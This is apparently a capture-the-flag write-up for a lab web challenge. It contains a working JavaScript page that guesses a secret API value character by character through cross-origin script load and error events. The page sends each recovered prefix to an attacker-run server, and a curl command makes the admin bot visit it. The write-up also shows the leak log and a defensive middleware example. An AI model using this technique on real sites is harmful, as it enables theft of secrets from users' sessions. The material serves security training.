SOC Complaints

IP address: 172.20.0.4
Port: 80
URL: http://172.20.0.4/

Description

If you cannot access a website, complain to the SOC team, and the SOC team will investigate.

Structure

.
├── app.js
├── config
│   └── cors.js
├── controllers
│   ├── complaints.js
│   └── manage.js
├── middlewares
│   └── error.js
├── package.json
├── routes
│   ├── complaints.js
│   └── manage.js
├── utils
│   ├── browser.js
│   └── database.js
└── views

Solution

Exploit

Attacker IP address

ip addr show docker0
6: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:40:01:c8:b5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:40ff:fe01:c8b5/64 scope link 
       valid_lft forever preferred_lft forever

IPv4: 172.17.0.1

Start a web server on the Docker interface with Python

python3 -m http.server 80 -b 172.17.0.1

Content of index.html

<html>
    <head>
        <title>EXPLOIT</title>
    </head>
    <body>
        <script>
            var alphabets = ' !"#$&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^`{|}~';
            var counter = 0;
            var secret = '';

            probeError = (url) => {
                let script = document.createElement('script');
                script.src = url;
                script.onload = async () => { 
                    secret = decodeURIComponent(url.split('?')[1].split('&')[1].split('=')[1]);
                    await fetch(`http://172.17.0.1/${secret}`);
                    counter = 0;
                    
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                script.onerror = () => {
                    counter = counter + 1;
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                document.head.appendChild(script);
            }
            probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);

        </script>
    </body>
</html>

Phish the SOC team

curl -X POST -H 'Content-type: application/json' -d '{"url": "http://172.17.0.1/"}' http://172.20.0.4/api/v1/complaints/
{"message":"your request was successfully submitted"}

Flag

└─$ python3 -m http.server 80 -b 172.17.0.1
Serving HTTP on 172.17.0.1 port 80 (http://172.17.0.1:80/) ...
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET / HTTP/1.1" 200 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC%7B HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-E HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-EN HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENO HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOU HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUG HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH%7D HTTP/1.1" 404 -

Explanation
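
The page above tells a right guess from a wrong one through the onload and onerror events of a cross-origin script include, which CORS does not restrict. The following defensive sketch is an added example, not code from the challenge or the original write-up: a dependency-free, Express-style middleware for a route like the secrets endpoint that rejects such loads with Fetch Metadata and sets response headers as a backstop. The names guardSensitiveApi, fetchMetadataVerdict and runConstructedCases, the policy, and the sample requests are assumptions made for illustration.

```javascript
'use strict';
// Added example: guard a sensitive JSON API route against cross-site includes.
// Connect/Express-style (req, res, next) signature; no dependencies.

// Decide from the request headers whether a browser request may reach the API.
function fetchMetadataVerdict(headers) {
  const site = headers['sec-fetch-site'];
  const dest = headers['sec-fetch-dest'];
  // No Fetch Metadata: a non-browser client, a legacy browser, or a plain-HTTP
  // URL (browsers send Sec-Fetch-* only to potentially trustworthy URLs).
  // Let it through; the response headers set below are the backstop.
  if (site === undefined) return 'allow';
  // An API response is never a script, image, frame or document.
  if (dest && dest !== 'empty') return 'block';
  // Policy choice: only the application's own origin may call the API.
  return site === 'same-origin' ? 'allow' : 'block';
}

function guardSensitiveApi(req, res, next) {
  // Backstops that do not depend on Fetch Metadata being sent:
  res.setHeader('Cross-Origin-Resource-Policy', 'same-origin');
  res.setHeader('X-Content-Type-Options', 'nosniff');
  res.setHeader('Vary', 'Sec-Fetch-Site, Sec-Fetch-Dest');
  if (fetchMetadataVerdict(req.headers) === 'block') {
    // Same status and body for every blocked request, whatever the query was.
    res.statusCode = 403;
    res.setHeader('Content-Type', 'application/json');
    res.end('{"message":"forbidden"}');
    return;
  }
  next();
}

// Constructed requests: a cross-site <script> include, a same-origin fetch(),
// and a client that sends no Fetch Metadata at all.
function runConstructedCases() {
  const cases = [
    { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors', 'sec-fetch-dest': 'script' },
    { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty' },
    {},
  ];
  return cases.map((headers) => {
    const sent = {};
    const res = { statusCode: 200, setHeader: (k, v) => { sent[k] = v; }, end: () => {} };
    guardSensitiveApi({ headers }, res, () => {});
    return { status: res.statusCode, corp: sent['Cross-Origin-Resource-Policy'] };
  });
}
console.log(runConstructedCases());
```

On a plain-HTTP deployment such as this lab, only the third case applies, so the Cross-Origin-Resource-Policy and nosniff headers carry the protection; the route handler should also answer matching and non-matching lookups with the same status code.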
